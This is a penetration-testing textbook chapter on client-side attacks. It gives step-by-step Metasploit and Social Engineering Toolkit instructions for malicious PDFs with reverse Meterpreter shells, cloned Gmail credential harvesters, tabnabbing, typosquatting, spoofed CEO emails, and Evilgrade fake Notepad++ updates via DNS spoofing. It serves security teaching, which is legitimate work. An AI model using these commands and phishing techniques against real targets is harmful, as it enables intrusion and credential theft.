Client Side Exploitation Methods

So let’s talk about some of the client side exploitation methods that we can utilize in real-world penetration tests.

Introduction

Before we actually get into creating a malicious PDF document, we will learn about the basics, which include the structure of a PDF document, using it for performing reconnaissance. So let’s begin.

The language of PDF is very descriptive, which gives us a wide variety of attack surface, so before jumping into the reconnaissance, first, let’s look at the basic structure of a PDF file.

In-case if you open up a PDF document inside wordpad or a notepad editor, you would see the following sections:

1. Header
2. Body
3. Cross reference table
4. Trailer

PDF Launch Action

PDF launch action is one of the most useful features of a PDF document. With PDF launch action, you can actually launch other things along with PDF. PDF launch action was widely abused in the older version of Adobe Reader in which PDF launch action was used to spread malware and botnets such as Zeus.

This discovery was first made by M86 Security researchers. According to them, users would receive an e-mail with the subject “Royal mail delivery invoice.”

The document contained an attached PDF that when downloaded by the users installed a Zeus bot on the victim’s computer.

The following dialog box appeared when the PDF document was opened. On pressing “Ok”, Zeus bot would be installed and executed in the PDF document.

Creating a PDF Document with a Launch Action

Let’s see how we can use the launch action in the PDF document. Experimenting with PDF launch action will be more convenient if you have an empty PDF file or one with minimum text. Once you have created a blank PDF, open it in Notepad or WordPad. It will look something similar to the following:

Note: Before you perform the exercise, make sure you download Adobe Reader 9.3.2 as the launch action is not patched. You can get it from oldapps.com

Next scroll down the file to find the name object section, the section would look as follows:

Next add the following line replacing <Length 500.

Here is how it will look:

Next save it as a .pdf document and open it in your Adobe Reader. You will see the following warning box:

Now, let’s see what this syntax means:

• /S = This parameter defines the type of action that should be performed. In this case it’s /launch.
• /Win = This defines that the operating system on which we will execute it is Windows, which becomes /Mac if the OS is Mac and /unix if you are executing it on a Linux system.
• /F = This parameter defines what type of application should run. In this case, it’s calc.exe, which will launch the calculator when executed.

Tools of the Trade

There are a couple of tools you can use to collect metadata from PDF, namely, metagoofil and PDFINFO. I would recommend PDFINFO as metagoofil is quite buggy.

PDFINFO

PDFINFO is a command line Unix-based tool used to gather information about a particular PDF document. The information includes the operating system, PDF reader version, etc. Now, let’s begin experimenting with PDFINFO.

We will use the blank.pdf we created in the launch action exercise. So let’s say that we want to gather information about blank.pdf. All we need to do is to issue the following command in the console.

PDFINFO “Your PDF Document”

Now let’s have a look at what useful information we could gather. In the first line, you can see the author’s name, “Abdul Rafay Baloch,” which might be very useful to us. Next, we see the most important line “Microsoft Word 2010”. This might not be of interest to a layperson, but a hacker is always interested in figuring out how this information can be put to use.

By identifying what PDF software a user has used to generate PDF files, a hacker might be able to find potential vulnerabilities in that software, or look for some already-discovered vulnerabilities for that particular version, and can use those vulnerabilities against the target.

Suppose you are pentesting against an organization. Knowing what software the organization uses for generating PDF files could be helpful to you in carrying out social engineering and other attacks.

PDFTK

PDFTK is another useful tool for generating PDF files, which has multiple functionalities like combining and compressing PDF files. It’s not very efficient though when compared to Origami Framework, which could be used to generate PDF files more conveniently.

If you would like to know more about this tool, visit http://www.pdflabs.com/docs/pdftk-cli-examples/

Origami Framework

Origami framework is used for creating and manipulating PDF frameworks. It is one of my favorite tools for creating and experimenting with PDF documents. It makes creating PDF much simpler than any other tool out there.

Installing Origami Framework on BackTrack

By default, Origami framework is not available on BackTrack, so we need to install in order to experiment with it. Here is how you can install Origami framework on your BackTrack.

1. First, download Origami framework’s latest release by issuing the following command in your console:

   wget http://seclabs.org/origami/files/origami-last.tar.gz

2. Next, you need to extract the contents by issuing the following command:

   tar xzvf origami-last.tar.gz

3. Congratulations! You have successfully installed Origami Framework. You can find Origami Framework in the directory named “origami-1.0.0-beta1”

I would strongly recommend you to get familiarized with this tool if you like to dig deeper into this subject.

Attacking with PDF

It’s finally time to attack with PDF. In this section, we will talk about some of the commonly used PDF exploits with Metasploit, then we will do it the easy way with the social engineering toolkit.

So without wasting any more time, let’s fire up Metasploit. Once in Metasploit console, type in the following command:

Search pdf

This will display all the exploits present in Metasploit with the pattern PDF. Most of the PDF exploits in Metasploit work by embedding an exe in the PDF file, making it harder for antivirus software or the victim to recognize the malicious file.

The exploits may range from buffer overflows to misuse of the configurations, such as PDF launch action discussed earlier. As you can see from the following screenshot that PDF exploits are generally been broken down into two categories:

1. Fileformat exploits
2. Browser exploits

Browser Exploits

Browser exploits are not used much by pentesters. However, they can prove beneficial in some situations. Here is how PDF browser exploit works:

1. The attacker chooses a browser PDF exploit module.
2. The browser PDF exploits take advantage of the built-in webserver from Metasploit.
3. Once the webserver is set up and the PDF exploits are loaded onto it, the URL is sent to the victim via social engineering.
4. Once the victim clicks on the URL, the PDF exploit is injected and does the rest of the work for you.

Scenario from Real World

The purpose of the book is not only to teach you to work with the tools but to familiarize you with a proper penetration testing methodology. Tools keep changing, but the methodology remains the same.

So imagine a real-world scenario where you are pentesting against a company ABC. By using some information-gathering techniques you learned in the previous chapter, you find out that the e-mail address of the CEO is steven@abc.com.

By using a fake mailer, you e-mail the following message to Steven from the e-mail address of the company’s IT department head, say, Rolph.

The CEO will think that the e-mail is legitimate and is really from the IT department, so he will open the PDF document without hesitation, thereby enabling the attacker to take full control of his computer.

Adobe PDF Embedded EXE

This is one of the most popular PDF exploits in Metasploit. This exploit embeds an executable in a PDF document and takes advantage of the PDF launch action vulnerability found inside the previous versions of Adobe Reader to exploit it.

The best exploit for the ABC company scenario will be a fileformat exploit, and what could be better than to use an Adobe PDF Embedded EXE for this task. So let’s go ahead and create a malicious PDF template with Metasploit.

• Step 1—Fire up Metasploit by typing “msfconsole” in the terminal.
• Step 2—Next, type in “use exploit/windows/fileformat/adobe_pdf_embedded_exe”.

• Step 3—Next, type “show options”. It will display the requirements you need to in order to create a template. You can use a predefined template, e.g., evil.pdf, or define a PDF that you want the exe to be embedded in.

  

  We can also see that the “INFILENAME” is required, so we need a blank PDF file in which it will embed the exe. You can use any PDF file you want.

  

  You can also edit the launch action message depending upon the scenario. You can do this by typing the following command:

  set LAUNCH_Message <message>

  

• Step 4—Once you are done with the exploit part, you need to choose an appropriate payload. To choose a payload, type the following command:

  set payload windows/meterpreter/reverse_tcp

  The payload will be followed by the LHOST and LPORT

  

• Step 5—Then type “exploit” and it will generate your malicious PDF file. It will save the PDF file in the /root/.msf4/local/ directory.
  

Finally, we will send it to the victim and trick him into executing it. Once it is executed, you will have injected a Meterpreter shell on his computer.

Social Engineering Toolkit

The Social Engineering toolkit makes PDF exploitation very easy. With this toolkit, you can generate a malicious PDF within seconds. It is just a matter of pressing 1’s and 2’s on the keyboard, and you get your malicious PDF file generated. Here is how you can generate a malicious PDF file with Metasploit.

• Step 1—Navigate to the “Social Engineering Attack Vectors” menu and then press “3” on the keyboard to move into the “Infectious Media Generator” menu.

• Step 2—Once you are inside the “Infectious Media Generator” menu, you will have to choose between two options:

  1. Fileformat exploits
  2. Standard Metasploit executable

  As we are working with fileformat exploits here, we will choose the first option by pressing “1” on the keyboard.

  

• Step 3—Next, it will ask for the reverse connection IP, which will be the IP of your BackTrack box.
• Step 4—Once you enter the appropriate IP, it will ask you for the type of the exploit you want to choose. We will choose “Adobe PDF Embedded EXE” exploit, which we used previously with Metasploit.
  

• Step 5—Next, it will ask if you would like to use your own PDF or a template available in SET.
• Step 6—Finally, you need to choose an appropriate payload. We will stick with the default “Windows/shell/reverse_tcp” for the time being.
  

• Step 7—Next, we need to enter the IP of our payload listener followed by the port on which our listener would run. The IP address would be the same as of our BackTrack box. You can choose the port of your choice. Just make sure that no other service is running on that port.
  

• Step 8—Finally, the SET will ask us if we would like to enable the listener, so it can start listening to incoming connections. Choose “Yes” and it would start the reverse handler on the port that we specified.
  

Once the victim runs the PDF file, you will receive a reverse connection to your BackTrack box.

So now you can see how easy it is to create malicious PDF files with SET.

That concludes our discussion on hacking with PDF. Many pentesters ignore PDF exploits thinking they are useless. These hackers really don’t know what PDF exploits are capable of. According to me, PDF exploitation is one of the best client side exploitation techniques.

Credential Harvester Attack

Credential harvester is a very popular attack; it can be used to perform a phishing attack. In a phishing attack, an attacker sets up a replica of a website, say, gmail.com, whenever the victim logs in to it, the credentials will be saved. This can be done with the “Credential Harvester Attack” in SET. Let’s see how to do it.

• Step 1—From the website attack vectors, select “Credential Harvester Attack.” Now you will have three options: you can use predefined templates in SET, clone a site of your choice, or import your own template, in case option 2 does not work for you. For the sake of simplicity, I will choose the first option.
  

• Step 2—It will now ask you the “IP address” to which you want the credentials posted, which in this case would be my local IP, since in this case I am attacking my LAN.
• Step 3—It will not show you the list of built-in templates. In this case, I want to use gmail.com.
  

As you can see from the screenshot, the credential harvester is up and running on the IP we entered. We can perform a DNS spoofing attack by replacing gmail.com’s IP with our’s where the credential harvester is running. We already learned about DNS spoofing in the “Network Sniffing” chapter (Chapter 6).

As soon as the victim navigates our IP address, where we have set up our credential harvester, his credentials would be recorded and displayed to us.

Tabnabbing Attack

Tabnabbing is another form of phishing attack, where the attacker takes advantage of the fact that the victim doesn’t normally think that tabs will change when he is not around. This type of attack would rewrite the existing tab with the attacker’s website. Whenever the victim comes back to that tab, he will think that he has logged out of a particular website and would try to log in again, and as soon as the victim logs in to his account, the attacker will capture the credentials. The SET can be used to launch this attack. Let’s see how it’s done.

• Step 1—Just beneath the “Credential Harvester” option, you will see “Tabnabbing attack.” Inside it, you will see the options for “Web templates.” Click on the “Site Cloner,” since the tabnabbing attack method does not support the first one.
• Step 2—Next, it will ask for the IP address where the attack is to be hosted followed by the website to clone, which in our case is gmail.com. Once you are done providing this information, the attack will be launched automatically.
  

• Step 3—Now, let’s see the attack on the victim’s website. As soon as the victim loads the site, he will see the following screen:
  

As soon as he switches the tab, the website will be redirected to the fake gmail log-in page.

As soon as our victim enters the credentials, his credentials will be saved.

Other Attack Vectors

We have other advanced attack vectors in the SET related to phishing. One of them is “Man Left in the Middle,” where the attacker requires an XSS vulnerability to trigger an attack. Since we haven’t learned about XSS vulnerability yet, we won’t discuss it now. We will learn all about it in the “Web Hacking” chapter (Chapter 12). Another great attack vector is the “Web Jacking” attack vector, where the victim would be presented a link stating “Website has been moved.” When the victim hovers his mouse over the link, it would point to the real URL, not the attacker’s URL. Here is what the victim would be presented with:

Whenever the victim clicks on it, gmail.com will open; however, it will be replaced with our malicious webserver after a few seconds.

Tip: A better attack strategy is to register a domain similar to the real domain; for example, in the case of facebook.com, you can register faceboook.com and host your attack there.

Browser Exploitation

Browser-based exploits are one of the most important forms of client side exploits. Imagine a scenario where you are pentesting against an organization. If it’s an internal pentest, you would already own a box on the LAN. If it’s an external pentest you need to somehow gain access to a system. You can set up a malicious webserver and ask the victim to visit the server. As soon as he clicks your link, he gets compromised.

Most of the employees of an organization frequently browse on social networking websites like Facebook and Orkut. We, as penetration testers, can take advantage of this and send malicious links to the employees and compromise them.

On an internal network, the attacker could simply use a DNS poisoning attack to redirect victims to his malicious webserver. To sum up, there is a whole lot of attack surface when it comes to browser exploitation.

Attacking over the Internet with SET

We will now discuss how to use the SET and other methods to attack over the Internet. In this particular demonstration, I will walk you through the process of attacking over the Internet when you are behind a NAT.

Attack Scenario over the Internet

So the attack scenario is pretty simple. Our malicious SET server hosting browser exploits would run on the public IP address 73.67.123.85. Whenever the victim having a local IP 192.168.1.2 and public IP 88.45.56.14 would try to connect at the SET server, it will redirect all the traffic coming to the attacker’s local IP address, 192.168.3.2, on a specific local port.

Note: To be able to perform this attack, the attacker should control the router’s incoming and outgoing communications.

Tip: For the malicious SET webserver, you should always use port 80 or port 443 because most of the times they are enabled by the firewall; if you specify a port that the firewall does not allow, the firewall will drop all the traffic coming to that port.

Now you know the attack scenario; let’s prepare our machines for the attack.

1. Configuring the SET to Ask for Public IP

   The set_config file has an option called AUTO_DETECT. When the option is set to “ON,” the SET does not ask for the public IP; it will automatically use our private IP for the reverse handler. As we want to use the SET to attack over the Internet, we would need to set the AUTO_DETECT to “OFF” as we want the SET to ask for our public IP. The set_config file is located in the /pentest/exploits/set/config directory. You can use any text editor to edit it.

   

2. Making Your IP Address Static

   The second step would be to set your IP static. On Windows, you can do it by accessing the properties of your network adapter and then clicking on the appropriate “Internet Protocol Version 4 (TCP/IPV4) Properties.” Here is an example:

   

   Since our attacker machine is a “BackTrack 5” machine, we would be only interested in making its IP static. We can do it by accessing the WICD manager. We can access it by going to Application → Internet → WICD Network Manager.

   Under WICD Network Manager, select the appropriate network interface and click on its properties and fill in the appropriate details (see the following screenshot).

   

3. Opening Ports on the Router

   Next, you need to open up two ports on your router: first, the one which the SET external webserver would be listening on (by default the SET webserver listens on port 80, but you can change it in the set_config file if you would like to), second, the one on which you would receive connections. The method for opening ports might differ based on what type of router you have. You can also use netcat to open up ports.

Make sure that you have disabled your antivirus and firewall, when opening the ports.

We can verify the open ports by using a free website called canyouseeme.org. We will check if your ports are opened.

Note: You really don’t need to open port 80, as the SET will automatically open it up for you.

Using Windows Box as Router (Port Forwarding)

Now your Windows box has a public IP 75.15.84.55 running on port 80 whereas your BackTrack box has the IP 192.168.1.4 hosting the server on local port 4444. You need to redirect the traffic from your Windows box to your BackTrack box. You can use a neat tool called SPI port forward for this task. Here’s how it’s done:

• Local Port: It’s the local port of your Windows machine.
• Remote Host: This is where our BackTrack box is located.
• Remote Port: The port on which your malicious webserver is running; since it’s running on 4444 on my BackTrack machine, we will use 4444.
• Max Connections: Number of connections you want to set up.

So whenever my Windows machine would receive a connection on port 80, it will forward it to the BackTrack machine running on 192.168.1.4 listening to port 4444.

Why Use Browser AutoPWN?

With so many different types of browsers, how can we possibly know what browser the victim uses. To find out, we perform the Browser AutoPWN attack, which loads the webserver with all the malicious browser-based exploits, including the ones for Opera, Firefox, Internet Explorer, Google Chrome, etc. So if the victim is on any one of these browsers, the malicious code will run into the victim’s browser, hence compromising his system.

Problem with Browser AutoPWN

At this point of time, you might be wondering why use an individual exploit when we can use Browser AutoPWN that can make our work a lot easier. The answer is we don’t want to be blocked by intrusion detection systems and other network defense strategies. Browser AutoPWNs are very loud at the other end and can be easily detected as we are just firing the exploits on the browsers. So this strategy is not advisable and many pentesters avoid using it.

• 4. Setting Up Malicious WebServer On SET

  Now, we can finally set up our malicious webserver via the SET as follows:

  • Step 1—From the SET attack menu we will choose “Metasploit Browser Attack Method.”
    

  • Step 2—Next, it will ask you for the type of webtemplate you would like to use; we will go with the first option. It will now ask if NAT forwarding or port forwarding is enabled; since we are using it, we will type “yes”.

    After that it will ask for your external IP address; you would need to enter your public IP. You can check your public IP by going to getip.com, apart from getip.com there are tons of other sites that can show your IP.

    

  • Step 3—Next it will ask if your reverse handler is on a different IP address from our public IP, we will type “yes,” since we are running it on our local IP address.
    

  • Step 4—Next, it will ask for the type of template you would like to use, go with any template you like.
    

  • Step 5—You will see a huge list of browser-related exploits that are present in Metasploit. Since we want to use browser autopwn in this particular scenario, we will select the “Metasploit Browser Autopwn” attack vector.
    

  • Step 6—Next, it will ask for the payload we want to use. In my case, I want to use my favorite payload, that is, Windows reverse_Meterpreter.
    

  • Step 7—Next, it would ask for the port to use for reverse connection. The default is 443, but you can choose any port you want.
    

Within a few minutes, the SET will launch the webserver. The victim would not be able to access it on the public IP address of the attacker on port 80.

VPS/Dedicated Server

Another method you can use would be a VPS server or a dedicated server installed with BackTrack, which is better, faster, and safer. On a dedicated server, you would have more freedom to install whatever you want. But, as it’s expensive than a VPS server, I recommend you buy a VPS server with BackTrack installed and use its public IP to launch different types of attacks.

How Evilgrade Works

Evilgrade is an open-source modular framework developed in Perl. It is capable of injecting its own fake updates. Evilgrade comes with built-in modules of different applications such as Notepad, iTunes, Safari, Windows Upgrade, and many other applications.

Prerequisites

In order for Evilgrade to work, you need to be able to manipulate the victim’s DNS traffic, which can be achieved in many ways. We will talk about this later.

Attack Scenario

In this scenario, we will be attacking a user on an internal network who frequently uses Notepad++ to do his daily work.

• We will exploit the Notepad++’s update process.
• We will then set up Evilgrade to exploit the upgrade process.
• We will now manipulate the DNS records such that Notepad++ redirects to our Evilgrade server whenever it performs an update.
• We will have the malicious payload on our evilgrade server, so the victim would download and execute our malicious payload.

Step 1—Creating a Windows Binary with Msfpayload

The first step would be to create a Windows binary to obtain a reverse Meterpreter shell. This is the code that would be executed on the victim’s machine whenever he updates Notepad++. We can use the msfpayload to generate a reverse Meterpreter payload.

Command:

root@bt:~# msfpayload windows/Meterpreter/reverse_tcp

lhost=192.168.75.144 lport=4444 X > xen.exe

This command will create a Windows binary that will connect back to us on port 4444 giving us a Meterpreter session.

Step 2—Setting up the Attack on Evilgrade

Evilgrade is installed in the /pentest/exploits/isr-evilgrade directory in BackTrack 5. Navigate to the directory and launch it.

Command:

root@bt:~#cd/pentest/exploits/isr-evilgrade

root@bt:/pentest/exploits/isr-evilgrade#./evilgrade

Step 3—Configuring the DNSAnswerIP

Next, we would set up the DNSAnswerIP to our local IP address. This IP will do the DNS answers for us.

Command:

evilgrade> set DNSAnswerIp 192.168.75.144

Step 4—Configuring the Module

We now need to configure the module that we want to use, the “Show Modules” command lists all the modules that are present in evilgrade.

As it is Notepad++ in our case, we will use the following command to configure the module:

evilgrade> configure notepadplus

Next, we will enter the “show options” module to list all the options that can be used with this module.

As you can see, we have only two options. The important one is the agent; this will be the path to our payload. In my case, I have saved it under /root/xen.exe. I will set it up by using the following command:

evilgrade(notepadplus)>set agent/root/xen.exe

Once you are done with it, enter “start” to start the DNS/Webserver.

Step 5—Setting up a Listener on Metasploit

Next, we will set up a listener on Metasploit where we would receive the connections. We enter the following command to do it:

msf> use exploit/multi/handler

msf> set payload windows/Meterpreter/reverse_tcp

msf> set LHOST 192.168.75.144

msf> set LPORT 4444

These commands would set up a listener on port 4444. When our agent is executed on the victim’s machine, it would send a reverse connection to our local IP address on port 4444.

Step 6—Performing DNS Spoofing Attacks

We have discussed how to launch DNS spoofing attacks in detail; therefore, I will walk you through the process briefly here. In order to perform a DNS spoofing attack, we need to change the place where Notepad installs updates to our local host. To do that, we have to edit the etter. dns file. You can do it by using the following command:

root@bt: pico/usr/local/share/ettercap/etter.dns

We now need to create a new “A” record, for notepad-plus.sourceforge.net, from where the Notepad++ would receive updates to our local IP.

Note: We came to know that Notepad++ receives updates from notepad-plus.sourceforge.net by entering the “show options” command in the module.

Next, launch the DNS spoofing attack with Ettercap or any other tool. If you are unsure of how to do it, refer to the “Network Sniffing” chapter (Chapter 6).

Step 7—So now we are ready to attack. As soon as the victim opens his Notepad++, he will be asked to update the application. As soon as the victim clicks “Yes,” our payload will be executed and we will enter a Meterpreter session.

Teensy USB

Teensy USB is a device that has the capability to emulate mouse and keyboard. It can help you bypass the autorun.inf protection, which means that you will be able to execute a code on the victim’s computer even if autorun.inf is disabled. With social engineering toolkit we can set up a WSCRIPT file which will download our payload and execute it as the device would emulate itself as a keyboard you can easily bypass the autorun.inf protections since your computer would recognize it as a Keyboard not a CD/USB or DVD. Teensy USB costs about $20, and it’s worth every penny.

Conclusion

In client side exploitation, we take advantage of the weakest link, that is, clients. Our major targets are client side software like web browsers, media players, and e-mail applications. The vulnerabilities in these software are published often, and clients usually do not update necessary patches frequently.

Another advantage we discussed is that it can help us exploit systems that are not directly accessible from the outside due to NAT, firewall, etc. We discussed various methods to launch client side exploits. We even talked about some advance attack vectors such as those used to compromise client side updates.

Further Reading

The SET’s official documentation has a great resource explaining how this attack could be launched. You can check it out at

http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)#Infectious_Media_Generator.